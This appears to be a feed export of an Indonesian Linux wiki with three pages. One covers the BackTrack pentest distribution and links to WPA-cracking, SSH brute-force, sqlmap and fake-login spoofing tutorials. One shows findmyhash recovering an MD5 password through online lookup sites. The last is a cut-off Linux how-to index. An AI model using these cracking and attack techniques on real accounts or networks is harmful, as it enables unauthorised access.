Backtrack dua dirilis pada tanggal 6 maret 2007 yang memasukkan lebih dari 300 tool security sedangkan versi beta 3 dari backtrack dirilis pada tanggal 14 desember 2007 yang pada rilis ketiga ini lebih difokuskan untuk support [[hardware]]. Sedangkan versi backtrack 3 dirilis pada tanggal 19 juni 2008 pada backtrack versi 3 ini memasukkan [[saint]] dan [[maltego]] sedangkan [[nessus]] tidak dimasukkan serta tetap memakai kernel versi 2.6.21.5. pada BackTrack 4 Final sekarang ini menawarkan [[kernel]] [[linux]] terbaru yaitu kernel 2.6.30.4 .Dilengkapi juga dengan patch untuk wireless driver untuk menanggulangi serangan [[wireless injection]] ([[wireless injection attacks]]) &lt;br /&gt;
&lt;br /&gt;
== Sejarah backtrack ==&lt;br /&gt;
&lt;br /&gt;
Backtrack dibuat oleh Mati Aharoni yang merupakan konsultan security dari Israel dan max mosser jadi merupakan kolaborasi komunitas, backtrack sendiri merupakan merger dari [[whax]] yang mana [[whax]] ini adalah salah satu distro [[linux]] yang digunakan untuk test keamanan yang asal dari [[whax]] sendiri dari [[knoppix]]. Ketika [[knoppix]] mencapi versi 3.0 maka dinamakan dengan [[whax]]. Dengan [[whax]] kita bisa melakukan test securtity dari berbagai jaringan dimana saja .&lt;br /&gt;
&lt;br /&gt;
Max mosser merupakan auditor security collection yang menghususkan dirinya untuk melakukan penetrasi keamanan di [[linux]], gabungan dari auditor dan whax ini sendiri menghasilakan 300 tool yang digunakan untuk testing security jaringan. Auditor security collection juga terdapat pada knoppix.&lt;br /&gt;
&lt;br /&gt;
== Fitur Backtrack ==&lt;br /&gt;
Fitur dari backtrack :&lt;br /&gt;
Diantara beberapa tool yang terdapat dalam backtrack :&lt;br /&gt;
&lt;br /&gt;
* Metasploit integration&lt;br /&gt;
* RFMON wireless drivers&lt;br /&gt;
* [[Kismet]]&lt;br /&gt;
* AutoScan-Network - AutoScan-Network is a network discovering and managing application&lt;br /&gt;
* [[Nmap]]&lt;br /&gt;
* [[Ettercap]]&lt;br /&gt;
* [[Wireshark]] (dulu di kenal sebagai [[Ethereal]])&lt;br /&gt;
&lt;br /&gt;
* Enumeration&lt;br /&gt;
* Exploit Archives&lt;br /&gt;
* [[Scanners]]&lt;br /&gt;
* Password Attacks&lt;br /&gt;
* Fuzzers&lt;br /&gt;
* [[Spoofing]]&lt;br /&gt;
* [[Sniffers]]&lt;br /&gt;
* Tunneling&lt;br /&gt;
* [[Wireless]] Tools&lt;br /&gt;
* [[Bluetooth]]&lt;br /&gt;
* Cisco Tools&lt;br /&gt;
* Database Tools&lt;br /&gt;
* Forensic Tools&lt;br /&gt;
* BackTrack Services&lt;br /&gt;
* Reversing&lt;br /&gt;
* Misc&lt;br /&gt;
&lt;br /&gt;
Tapi disamping tool jaringan backtrack memasukkan [[mozilla]], [[pidgin]], [[k3b]], [[xmms]] dll.&lt;br /&gt;
&lt;br /&gt;
==Rilis Backtrack==&lt;br /&gt;
&lt;br /&gt;
 26-05-2006 rilis backtrack pertama kali yang merupakan versi non beta 1.0&lt;br /&gt;
 13-10-2006 backtrack 2 beta pertama untuk publik di rilis&lt;br /&gt;
 19-11-2006 backtrack 2 beta kedua untuk publik di rilis&lt;br /&gt;
 06-03-2007 backtrack 2 final dirilis&lt;br /&gt;
 17-12-2007 backtrack 3 beta pertama dirilis &lt;br /&gt;
 19-03-2008 backtrack 3 final dirilis&lt;br /&gt;
 11-02-2009 Backtrack 4 first beta release ([[Backtrack]] sekarang berbasis [[Debian]])&lt;br /&gt;
 19-06-2009 BackTrack 4 pre-final release.&lt;br /&gt;
 09-01-2010 BackTrack 4 final release.&lt;br /&gt;
 05-08-2010 Backtrack 4 R1 release&lt;br /&gt;
 10-05-2011 BackTrack 5 Released&lt;br /&gt;
&lt;br /&gt;
==Instalasi==&lt;br /&gt;
* [[Backtrack: Daftar Repository]]&lt;br /&gt;
* [[Backtrack: Membuat Repository Backtrack menggunakan debmirror]]&lt;br /&gt;
* [[Backtrack: Membuat Repository Backtrack menggunakan wget]] - lebih mudah&lt;br /&gt;
* [[Backtrack: Install di Harddisk]]&lt;br /&gt;
* [[Backtrack: Instalsi LiveUSB]]&lt;br /&gt;
* http://www.zimbio.com/Ubuntu+Linux/articles/e1_qHsbCMfz/Install+Backtrack+Applications+Ubuntu&lt;br /&gt;
* [[Backtrack: Install Aplikasi Backtrack di Ubuntu]]&lt;br /&gt;
* http://anjarpras.blogspot.com/2011/07/how-to-fix-blank-screen-after-install.html&lt;br /&gt;
&lt;br /&gt;
===Ubuntu Pentest Edition===&lt;br /&gt;
&lt;br /&gt;
* http://www.ubuntugeek.com/ubuntu-pentest-edition-for-penetration-testing.html&lt;br /&gt;
* http://www.netinfinity.org/tools/&lt;br /&gt;
* http://www.netinfinity.org/download/&lt;br /&gt;
&lt;br /&gt;
==Konfigurasi Backtrack==&lt;br /&gt;
* [[Backtrack: Mengaktifkan Interface]]&lt;br /&gt;
* [[Backtrack: Mengkonfigurasi IP address]]&lt;br /&gt;
* [[Backtrack: Menyambungkan ke Wireless HotSpot]]&lt;br /&gt;
* [[Backtrack:_Upgrade_Ke_Versi_Terbaru]]&lt;br /&gt;
* http://indobacktrack.or.id/content.php?173-Backtrack-4-(Tanpa-LILO)&lt;br /&gt;
* http://indobacktrack.or.id/content.php?172-Konfiguras-IP-di-Backtrack-3&lt;br /&gt;
* http://www.backtrack-linux.org/tutorials/customize-backtrack/&lt;br /&gt;
* http://www.offensive-security.com/backtrack/customising-backtrack-live-cd-the-easy-way/&lt;br /&gt;
* [[Backtrack: Menyambungkan modem ZTE AC2726i]]&lt;br /&gt;
* [[dnsset]] Konfigurasi [[DNS]] Otomatis&lt;br /&gt;
&lt;br /&gt;
==Enumeration==&lt;br /&gt;
* [[Cari Subdomain Dengan dnsmap]]&lt;br /&gt;
* [[Backtrack: DMitry]] Deepmagic Information Gathering Tool&lt;br /&gt;
* [[CMS Identification Menggunakan whatweb]]&lt;br /&gt;
* [[CMS Identification Menggunakan blindelephant]]&lt;br /&gt;
&lt;br /&gt;
==Wireless Hacking==&lt;br /&gt;
&lt;br /&gt;
* [http://forum.indonesianbacktrack.or.id/forumdisplay.php?fid=26 Backtrack: Kungfu Wireless]&lt;br /&gt;
* [[Wireless Hacking]]&lt;br /&gt;
* [[Kismet | Backtrack: Kismet Scanning Frekuensi]]&lt;br /&gt;
* [[Backtrack: Tutorial cracking WPA PSK]]&lt;br /&gt;
* http://indobacktrack.or.id/2009/06/hacking-wifi-di-backtrack-3/&lt;br /&gt;
* http://indobacktrack.or.id/2009/09/cracking-wpawpa2-psk-gpu-dengan-pyrit-pre-build-packages-bawaan-backtrack/&lt;br /&gt;
* http://code.google.com/p/pyrit/&lt;br /&gt;
* [[Tutorial agak lengkap tentang Wireless Hacking WEP dan WPA]]&lt;br /&gt;
&lt;br /&gt;
==Hacking==&lt;br /&gt;
* [[Cracking MD5 Dengan findmyhash]]&lt;br /&gt;
* [http://forum.indonesianbacktrack.or.id/forumdisplay.php?fid=20 Backtrack: Security &amp;amp; Hacking Discuss]&lt;br /&gt;
* [http://forum.indonesianbacktrack.or.id/showthread.php?tid=706 ettercap dns_spoof (fake login)]&lt;br /&gt;
* [[Instalasi Web Scarab Vulnerabilities Scanner]]&lt;br /&gt;
* http://indobacktrack.or.id/2010/05/instalasi-web-scarab-vulnerabilities-scanner/&lt;br /&gt;
* [[Backtrack: Cracking Password Windows]]&lt;br /&gt;
* [[Backtrack: sslstrip - hacking https]]&lt;br /&gt;
* http://sectools.org/web-scanners.html&lt;br /&gt;
* [[Backtrack: Kumpulan Wordlist]]&lt;br /&gt;
* [[Backtrack: Menjebol SSH secara BruteForce]]&lt;br /&gt;
* [[Backtrack: sqlmap untuk menjebol dynamic web]]&lt;br /&gt;
* [[Backtrack: mysqlaudit untuk audit MySQL]]&lt;br /&gt;
* [[nmap: scanning sebuah mesin]]&lt;br /&gt;
* http://ezine.echo.or.id/ezine8/ez-r08-zylon-johntheripper.txt&lt;br /&gt;
* [[Melihat struktur folder web server]]&lt;br /&gt;
* [[OS Fingerprinting Menggunakan zenmap]]&lt;br /&gt;
&lt;br /&gt;
===Hacking Video===&lt;br /&gt;
&lt;br /&gt;
* [http://forum.indonesianbacktrack.or.id/forumdisplay.php?fid=87 Backtrack: Video Tutorial Backtrack 5]&lt;br /&gt;
* [http://forum.indonesianbacktrack.or.id/forumdisplay.php?fid=17 Backtrack: Video Tutorial Backtrack 4]&lt;br /&gt;
* http://www.fileserve.com/file/bA44ghM&lt;br /&gt;
* http://www.fileserve.com/file/KEwD6ub&lt;br /&gt;
* http://www.fileserve.com/file/xYPWeWY&lt;br /&gt;
* http://www.fileserve.com/file/7PbFvWj&lt;br /&gt;
* http://www.fileserve.com/file/MWBMqeU&lt;br /&gt;
* http://www.fileserve.com/file/VDPfSER&lt;br /&gt;
* http://www.fileserve.com/file/gGxPUWH&lt;br /&gt;
* http://www.fileserve.com/file/kdKmTfx&lt;br /&gt;
&lt;br /&gt;
==Lain-lain==&lt;br /&gt;
* [[Cara Menggunakan ipcalc]]&lt;br /&gt;
* http://code.google.com/p/bt5-fixit/source/checkout&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
&lt;br /&gt;
* http://indobacktrack.or.id/&lt;br /&gt;
* http://www.backtrack-linux.org&lt;br /&gt;
* http://www.backtrack-linux.org/downloads/&lt;br /&gt;
* http://www.backtrack-linux.org/tutorials/backtrack-forensics/&lt;br /&gt;
* http://www.backtrack-linux.org/bt/wireless-drivers/&lt;br /&gt;
* http://www.offensive-security.com/backtrack/penetration-testing-information-security-distribution/&lt;br /&gt;
* http://www.ilmuhacking.com/&lt;br /&gt;
* http://forum.indonesianbacktrack.or.id&lt;br /&gt;
* http://id-backtrack.com&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
* [[GnackTrack]]&lt;br /&gt;
* [[Ubuntu Pentest Edition]]&lt;br /&gt;
* [[Samurai Pentest]]&lt;br /&gt;
* [[Beberapa Tip Hacking]]&lt;br /&gt;
* [[Wireless Hacking]]&lt;br /&gt;
* [[Keamanan Jaringan]]&lt;br /&gt;
&lt;br /&gt;
[[Category: hacking]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Cracking_MD5_Dengan_findmyhash&amp;diff=30800</id>
		<title>Cracking MD5 Dengan findmyhash</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Cracking_MD5_Dengan_findmyhash&amp;diff=30800"/>
		<updated>2012-03-11T14:17:28Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: findmyhash adalah tool yang berguna untuk men-decrypt hash yang kita miliki. Tool ini akan memasukkan hash kita ke berbagai website encrypter.&amp;lt;em&amp;gt;(kira-kira begitu)&amp;lt;/em&amp;gt; Kalau di [...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;findmyhash adalah tool yang berguna untuk men-decrypt [[hash]] yang kita miliki. Tool ini akan memasukkan hash kita ke berbagai website [[encrypter]].&amp;lt;em&amp;gt;(kira-kira begitu)&amp;lt;/em&amp;gt;&lt;br /&gt;
Kalau di [[BackTrack]] tempatnya ada di /pentest/passwords/findmyhash&lt;br /&gt;
&lt;br /&gt;
==Developer==&lt;br /&gt;
Yang bikin findmyhash adalah: &lt;br /&gt;
 [Web]           http://laxmarcaellugar.blogspot.com/&lt;br /&gt;
 [Mail/Google+]  bloglaxmarcaellugar@gmail.com&lt;br /&gt;
 [twitter]       @laXmarcaellugar&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Daftar Hash ==&lt;br /&gt;
Hash yang bisa di-decrypt dengan findmyhash:&lt;br /&gt;
&lt;br /&gt;
*  MD4       - RFC 1320&lt;br /&gt;
*  MD5       - RFC 1321&lt;br /&gt;
*  SHA1      - RFC 3174 (FIPS 180-3)&lt;br /&gt;
*  SHA224    - RFC 3874 (FIPS 180-3)&lt;br /&gt;
*  SHA256    - FIPS 180-3&lt;br /&gt;
*  SHA384    - FIPS 180-3&lt;br /&gt;
*  SHA512    - FIPS 180-3&lt;br /&gt;
*  RMD160    - RFC 2857&lt;br /&gt;
*  GOST      - RFC 5831&lt;br /&gt;
*  WHIRLPOOL - ISO/IEC 10118-3:2004&lt;br /&gt;
*  LM        - Microsoft Windows hash&lt;br /&gt;
*  NTLM      - Microsoft Windows hash&lt;br /&gt;
*  MYSQL     - MySQL 3, 4, 5 hash&lt;br /&gt;
*  CISCO7    - Cisco IOS type 7 encrypted passwords&lt;br /&gt;
*  JUNIPER   - Juniper Networks $9$ encrypted passwords&lt;br /&gt;
*  LDAP_MD5  - MD5 Base64 encoded&lt;br /&gt;
*  LDAP_SHA1 - SHA1 Base64 encoded&lt;br /&gt;
&lt;br /&gt;
== Contoh Penggunaan==&lt;br /&gt;
Contoh penggunaan findmyhash untuk cracking md5&lt;br /&gt;
&lt;br /&gt;
 root@batik:/pentest/passwords/findmyhash# ./findmyhash.py MD5 -h 21232f297a57a5a743894a0e4a801fc3 &lt;br /&gt;
 &lt;br /&gt;
 Cracking hash: 21232f297a57a5a743894a0e4a801fc3 &lt;br /&gt;
  &lt;br /&gt;
 Analyzing with cmd5 (http://www.cmd5.org)...&lt;br /&gt;
 ... hash not found in cmd5&lt;br /&gt;
 &lt;br /&gt;
 Analyzing with bigtrapeze (http://www.bigtrapeze.com)...&lt;br /&gt;
 ... hash not found in bigtrapeze&lt;br /&gt;
 &lt;br /&gt;
 Analyzing with hashchecker (http://www.hashchecker.com)...&lt;br /&gt;
 ... hash not found in hashchecker&lt;br /&gt;
 &lt;br /&gt;
 Analyzing with md5hashcracker (http://md5hashcracker.appspot.com)...&lt;br /&gt;
 &lt;br /&gt;
 ***** HASH CRACKED!! *****&lt;br /&gt;
 The original string is: admin&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 The following hashes were cracked:&lt;br /&gt;
 ----------------------------------&lt;br /&gt;
 &lt;br /&gt;
 21232f297a57a5a743894a0e4a801fc3 -&amp;gt; admin&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
* [[Linux Howto]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Linux_Howto&amp;diff=28750</id>
		<title>Linux Howto</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Linux_Howto&amp;diff=28750"/>
		<updated>2011-12-25T09:57:51Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Security &amp;amp; Network Security */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Non-Teknis==&lt;br /&gt;
&lt;br /&gt;
* [[Beberapa kisah penggunaan Open Source Software]]&lt;br /&gt;
* [http://infolinux.or.id/category/lowongan/ Lowongan Kerja Linux]&lt;br /&gt;
* [[Strategi Migrasi Windows ke Linux]]&lt;br /&gt;
* [[Alternatif Open Source juga untuk Windows]]&lt;br /&gt;
* [[Tempat Memperoleh ISO / CD / DVD Linux]]&lt;br /&gt;
* [[Majalah Linux]]&lt;br /&gt;
* [[Beberapa Distro Linux Indonesia]]&lt;br /&gt;
* [[ReactOS - Windows yang Bukan Windows]]&lt;br /&gt;
* [[Membantu Terjemahkan Linux ke Bahasa Indonesia]]&lt;br /&gt;
* [[Open Source, Open Mind dan Open Concept]]&lt;br /&gt;
* [[Mengenal Varian Distro-Distro Linux]]&lt;br /&gt;
&lt;br /&gt;
==Manual / Panduan / Dokumentasi==&lt;br /&gt;
&lt;br /&gt;
* http://linux2.arinet.org - register untuk men-download dokumentasi.&lt;br /&gt;
* http://www.linux.or.id&lt;br /&gt;
* http://www.ubuntu-id.org&lt;br /&gt;
* http://slackware.linux.or.id/slackbook/&lt;br /&gt;
* https://wiki.ubuntu.com/BeginnersTeam - buku untuk pemula&lt;br /&gt;
&lt;br /&gt;
* [http://wiki.ubuntu-id.org/PanduanUbuntu Panduan Ubuntu Bahasa Indonesia]&lt;br /&gt;
* [http://wiki.ubuntu-id.org/BlankOn/Dokumentasi/ Panduan BlankOn Bahasa Indonesia]&lt;br /&gt;
* [http://www.ubuntu-id.org/doc/edgy/ubuntu/desktopguide/id/index.html Ubuntu Desktop Guide Bahasa Indonesia]&lt;br /&gt;
* [http://www.ubuntu-id.org/doc/edgy/kubuntu/desktopguide/id/index.html Kubuntu Desktop Guide Bahasa Indonesia]&lt;br /&gt;
* [http://www.ubuntu-id.org/doc/edgy/xubuntu/desktopguide/id/index.html Xubuntu Desktop Guide Bahasa Indonesia]&lt;br /&gt;
* [https://help.ubuntu.com/6.10/ubuntu/serverguide/C/index.html Ubuntu Server Guide Bahasa Indonesia]&lt;br /&gt;
* [http://www.ubuntu-id.org/doc/edgy/ubuntu/packagingguide/id/index.html Ubuntu Packaging Guide Bahasa Indonesia]&lt;br /&gt;
* http://ubuntu-indonesia.com/forums/ubbthreads.php/topics/18006/1&lt;br /&gt;
* http://ubuntulinux.or.id/blog/2010/04/14/ubuntu-electronics-remix/&lt;br /&gt;
* http://ubuntu-indonesia.com/forums/ubbthreads.php/topics/18006/Ebook_sudah_bisa_dinikmati_har#Post18006&lt;br /&gt;
* http://ubuntu-indonesia.com/public/InstalasiUbuntuDesktop10.04.LTS.pdf.zip&lt;br /&gt;
* http://ubuntu-indonesia.com/public/DesktopEnviroinment.pdf.zip&lt;br /&gt;
* http://ubuntu-indonesia.com/public/OptimalisasiUbuntuLinux.pdf.zip&lt;br /&gt;
* http://ubuntu-indonesia.com/public/Tips&amp;amp;TrikUbuntu.pdf.zip&lt;br /&gt;
* http://ubuntu-indonesia.com/public/BerinternetdenganUbuntu.pdf.zip&lt;br /&gt;
* [[Mengenal Varian Distro-Distro Linux]]&lt;br /&gt;
* http://en.m.wikipedia.org/wiki/Comparison_of_Windows_and_Linux?wasRedirected=true&lt;br /&gt;
* http://www.whylinuxisbetter.net/index_id.php?lang=id&lt;br /&gt;
* http://elco.teknikelektronika.net/&lt;br /&gt;
* http://replayfrom.wordpress.com/full-circle-magazine/&lt;br /&gt;
* http://ubuntuguide.org/wiki/Ubuntu:Maverick&lt;br /&gt;
* http://tutorial.jaringankantor.com/&lt;br /&gt;
&lt;br /&gt;
==Instalasi Linux==&lt;br /&gt;
&lt;br /&gt;
===[[SourceForge Open Source di Indonesia]]===&lt;br /&gt;
&lt;br /&gt;
===[[System Operasi Muslim]]===&lt;br /&gt;
&lt;br /&gt;
===[[Sabily ID]]===&lt;br /&gt;
&lt;br /&gt;
===Instalasi Linux===&lt;br /&gt;
* [[Situs untuk Download ISO Linux]]&lt;br /&gt;
* [[check md5 checksum]]&lt;br /&gt;
* [[Partisi Harddisk Menggunakan fdisk]]&lt;br /&gt;
* http://replayfrom.wordpress.com/2011/01/01/ubuntu-partisi-untuk-ubuntu/&lt;br /&gt;
* [[Instalasi Ubuntu]]&lt;br /&gt;
* [[Instalasi Ubuntu 10.10 Server]]&lt;br /&gt;
* [[Instalasi Dual Boot]]&lt;br /&gt;
* [[Instalasi xcode ke harddisk / usb]]&lt;br /&gt;
* [http://danubudi.web.id/sistem-direktori-linux-dan-model-partisi/ Sistem Direktori Linux dan Model Partisi]&lt;br /&gt;
* [http://wiki.ubuntu-id.org/BlankOn/Dokumentasi/Pengguna/PanduanInstalasi Panduan Instalasi BlankOn]&lt;br /&gt;
* [http://firstly.wordpress.com/2008/02/16/installasi-slackware-buat-pemula-banget/ Instalasi Slackware buat Pemula banget]&lt;br /&gt;
* [[Menginstall Gyachi di Linux]]&lt;br /&gt;
* [[Membersihkan (purge &amp;amp; clean) paket Debian yang pernah di install]]&lt;br /&gt;
* [[Distro SchoolOnffLine]]&lt;br /&gt;
* http://numpanglewat.wordpress.com/2008/08/20/cara-flash-usb-live-installasi-and-remastering-of-slax/&lt;br /&gt;
* [[Membuat MultiLinux di sebuah komputer]]&lt;br /&gt;
* [[Merubah tampilan boot grube menu ubuntu mengunakan foto sendiri]]&lt;br /&gt;
* [[Menggunakan tasksel untuk memudahkan instalasi tambahan paket]]&lt;br /&gt;
* [[Cek versi Ubuntu yang terinstall]]&lt;br /&gt;
* [[Instalasi Aplikasi di Linux]]&lt;br /&gt;
* [[Instalasi Linux - Layar VGA tidak keluar apa-apa? atau kacau]]&lt;br /&gt;
* [[Instalasi Linux FAQ - WiFi card tidak terdetek?]]&lt;br /&gt;
* [[Ganti Splash Screen Ubuntu]]&lt;br /&gt;
* [[Cara mengembalikan ikon wireless di sebelah kanan atas desktop ubuntu]]&lt;br /&gt;
* [[Reset password root]]&lt;br /&gt;
* [[Instalasi NVIDIA – Driver Pada Ubuntu 10.04 (Lucid) LTS + Tips &amp;amp; Trick]]&lt;br /&gt;
* [[Upgrade versi semua aplikasi ke versi yang lebih baru]]&lt;br /&gt;
* http://en.wikipedia.org/wiki/Comparison_of_file_systems - Perbandingan [[System Operasi]]&lt;br /&gt;
* [[Apt-proz: Apt-fast dengan Engine ProZilla]]&lt;br /&gt;
* [[Grub]]&lt;br /&gt;
* [[Menaikkan Nilai APT::Cache-Limit]]&lt;br /&gt;
* [[Membuat Installer deb dari sebuah aplikasi]]&lt;br /&gt;
* http://bloglinux-patenpisan.blogspot.com/2011/09/ubuntu-mengupdate-sistem-ubuntu-secara.html&lt;br /&gt;
&lt;br /&gt;
====Data Recovery Partisi yang Terformat====&lt;br /&gt;
* [[Recovery data harddisk yang terformat]]&lt;br /&gt;
* [[Memperbaiki Partisi dan Recovery File]]&lt;br /&gt;
* [[Booting Linux, Fsck terus yang bikin frustasi]]&lt;br /&gt;
&lt;br /&gt;
====Memperbaiki Grub / NTLDR====&lt;br /&gt;
* [[NTLDR Missing]]&lt;br /&gt;
* [[Mengembalikan / Rescue GRUB]]&lt;br /&gt;
* [[Rescue GRUB sesudah update kernel]]&lt;br /&gt;
* [[Solusi Tidak Bisa Booting pada Linux Ubuntu 10.04]]&lt;br /&gt;
* [[Mengembalikan bootloader Ubuntu yang hilang setelah install Windows]]&lt;br /&gt;
&lt;br /&gt;
===Instalasi LiveUSB===&lt;br /&gt;
* [[Membuat LiveUSB]]&lt;br /&gt;
* [[Penggunaan Unetbootin]]&lt;br /&gt;
* [[Membuat Installer Ubuntu di USB FlashDisk menjadi LiveUSB]]&lt;br /&gt;
** [[Install Ubuntu 7.10 Dari USB Flashdisk]]&lt;br /&gt;
** [http://firstly.wordpress.com/2008/07/24/membuat-ubuntu-804-live-usb/ Membuat Ubuntu 8.04 LiveUSB]&lt;br /&gt;
** [[Membuat LiveUSB dari Ubuntu Desktop]]&lt;br /&gt;
* [[Membuat Installan Ubuntu Remix]]&lt;br /&gt;
* [[Install Ubuntu via USB memakai plop boot manager di PC yang tidak ada opsi booting via USB]]&lt;br /&gt;
&lt;br /&gt;
===[[Repository]]===&lt;br /&gt;
* http://repogen.simplylinux.ch/ - Generate sources.list automatis :)&lt;br /&gt;
* [[Contoh isi file /etc/sources.list di Ubuntu]]&lt;br /&gt;
* [[Daftar Repository Ubuntu]]&lt;br /&gt;
* [http://wiki.ubuntu-id.org/DistribusiDvdReposUbuntu Distribusi DVD Repository Ubuntu]&lt;br /&gt;
* [http://www.debian.org/mirror/ftpmirror Setting up a Debian archive mirror]&lt;br /&gt;
* [[Membuat Repository Ubuntu Lokal]]&lt;br /&gt;
* [[Membuat Repository Ubuntu Lokal tanpa SERVER]]&lt;br /&gt;
* [[Membuat Repository Ubuntu Lokal dari hasil Download Repository]]&lt;br /&gt;
* [[Membuat Repository Ubuntu Lokal menggunakan debmirror]]&lt;br /&gt;
* [[Membuat Repository Debian Lokal menggunakan debmirror]]&lt;br /&gt;
* [[Membuat Mirrorkeyring untuk debmirror]]&lt;br /&gt;
* [[Backtrack: Membuat Repository Backtrack menggunakan debmirror]]&lt;br /&gt;
* [[Mengcompile Ulang Repository Ubuntu]]&lt;br /&gt;
* [[Membuat Beberapa Repository Lokal di Satu Mesin]]&lt;br /&gt;
* [http://surabaya.linux.or.id/archives/2008/07/09/membuat-mirror-ubuntu-dengan-debmirror.html Membuat Mirror Ubuntu dengan debmirror]&lt;br /&gt;
* [http://surabaya.linux.or.id/archives/2008/03/02/membuat-dvd-repository-debianubuntu.html Membuat DVD Repository Debian Ubuntu]&lt;br /&gt;
* [[Membuat Repository Menggunakan APTonCD]]&lt;br /&gt;
* [[Mengenalkan DVD Repository ke Ubuntu]]&lt;br /&gt;
* [[Membuat Mirror Ubuntu di DVD]]&lt;br /&gt;
* [[Script Sedot untuk Mirroring Repo]]&lt;br /&gt;
* [[Error Could not get lock waktu update repository]]&lt;br /&gt;
* [[Error apt get update dynamic mmap ran out of room]]&lt;br /&gt;
* [[GPG error NO PUBLIC KEY dari launchpad]]&lt;br /&gt;
&lt;br /&gt;
===[[Remastering Ubuntu]]===&lt;br /&gt;
* [[Distro SchoolOnffLine]]&lt;br /&gt;
* [[Distro SMEOnffLine]]&lt;br /&gt;
* [[Distro ORARINux]]&lt;br /&gt;
* [[Distro SekolahNux]]&lt;br /&gt;
* [[Distro IPTEKNux]]&lt;br /&gt;
* [[Remastering Fedora dengan Revisor]]&lt;br /&gt;
&lt;br /&gt;
===Konfigurasi Desktop===&lt;br /&gt;
&lt;br /&gt;
* [[gconftool-2 untuk mengkonfigurasi gnome desktop]]&lt;br /&gt;
* http://www.ubuntu-art.org - tempat [[Wallpaper]], Art Ubuntu &#039;&#039;&#039;(Recommended)&#039;&#039;&#039;&lt;br /&gt;
* http://www.gnome-look.org/&lt;br /&gt;
** [[Beberapa Theme Mirip XP]]&lt;br /&gt;
* http://www.howtoforge.com/mac4lin_make_linux_look_like_a_mac - Agar [[Linux]] bertampilan Mac.&lt;br /&gt;
* http://pujanggaitusudahmati.wordpress.com/2010/03/10/instalasi-ubuntu-studio-theme-pada-ubuntu-karmic/&lt;br /&gt;
* [[xorg.conf untuk mereka yang menggunakan Sis]]&lt;br /&gt;
* [[Instalasi Sis 771/671]]&lt;br /&gt;
* http://pujanggaitusudahmati.wordpress.com/2010/05/02/cara-merubah-window-control-position-ubuntu-lucid/&lt;br /&gt;
* http://omnialinux.com/omniaxp/ - Linux yang mirip banget dengan XP&lt;br /&gt;
* http://www.omgubuntu.co.uk/2010/07/one-stop-shop-for-ubuntu-customization.html&lt;br /&gt;
* [[Menambahkan atau Mengubah Bahasa di Ubuntu]]&lt;br /&gt;
* [[Network Manager Icon Hilang dari Gnome]]&lt;br /&gt;
&lt;br /&gt;
===[[Linux Benchmarking]]===&lt;br /&gt;
&lt;br /&gt;
===Lain lain===&lt;br /&gt;
* [[Linux XP]]&lt;br /&gt;
* [[Backup Harddisk dan Cloning Komputer]]&lt;br /&gt;
* [[Mengembalikan / Rescue GRUB]]&lt;br /&gt;
* [[Ganti Motherboard dengan Harddisk Linux yang sama]]&lt;br /&gt;
* [[Ghost for Linux]]&lt;br /&gt;
* [[Konversi file .bin / .cue ke .iso di Ubuntu]]&lt;br /&gt;
* http://ubuntuforums.org/showthread.php?t=417761 - Recovery Data yang Hilang.&lt;br /&gt;
* [[Cek / memperbaiki partisi harddisk]]&lt;br /&gt;
* [[Disk Quota]]&lt;br /&gt;
&lt;br /&gt;
===Driver===&lt;br /&gt;
Kadang kala ada driver / card yang tidak terdeteksi di [[Linux]]. Mungkin ada baiknya mencoba cara berikut ini&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;[[Teknik Deteksi Driver Automatis di Ubuntu]] - cara paling manjur&#039;&#039;&#039;&lt;br /&gt;
* [[Driver dan CODEC untuk Multimedia di Linux]]&lt;br /&gt;
* [[Penggunaan driver Windows dengan ndiswrapper]]&lt;br /&gt;
* http://ubuntu-semarang.org/blog/2007/11/solusi-ubuntu-untuk-acer-4520/&lt;br /&gt;
* [[D-link DWA-110 Driver untuk Ubuntu]]&lt;br /&gt;
* [[Instalasi Adobe Flash Player]]&lt;br /&gt;
* [[Mengatasi Masalah Touchpad di Jaunty 9.04]]&lt;br /&gt;
* [[Printer Driver di Linux]]&lt;br /&gt;
* http://www.ubuntugeek.com/how-to-fix-sound-problem-in-ubuntu-9-10-karmic.html&lt;br /&gt;
* [[Instalasi Java]]&lt;br /&gt;
* [[Instalasi Java di Firefox]]&lt;br /&gt;
* [[Deteksi USB Modem]]&lt;br /&gt;
* http://ubuntuguide.org/wiki/Ubuntu:Maverick#Modems_.2F_Dial-up&lt;br /&gt;
* http://wireless.kernel.org/en/users/Drivers - driver wireless&lt;br /&gt;
* [[Supaya Broadcom bisa bekerja dengan Wireshark]]&lt;br /&gt;
* [[Wireless / WiFi tidak terdeteksi setelah di Install Ubuntu]]&lt;br /&gt;
* [[Alternatif Instalasi Driver Wireless Broadcom]]&lt;br /&gt;
* [[Instalasi NVIDIA – Driver Pada Ubuntu 10.04 (Lucid) LTS + Tips &amp;amp; Trick]]&lt;br /&gt;
* [[VGA Sis 771/671 di Ubuntu 10.04 Lucid Lynx atau BlankOn 6.0 Ombilin]]&lt;br /&gt;
* [[Linux driver untuk STK11 Webcam Video Adapter]]&lt;br /&gt;
* [[Linux driver untuk EasyCap USB2.0 Video Adapter]]&lt;br /&gt;
* [[Linux driver untuk canon pixma ip1880]]&lt;br /&gt;
* http://pakeklinux.wordpress.com/2010/05/09/cara-install-driver-vga-nvidia-di-ubuntu-10-04-lucid-lynx/&lt;br /&gt;
&lt;br /&gt;
==Aplikasi==&lt;br /&gt;
&lt;br /&gt;
===Linux Dasar===&lt;br /&gt;
* [[Shell]]&lt;br /&gt;
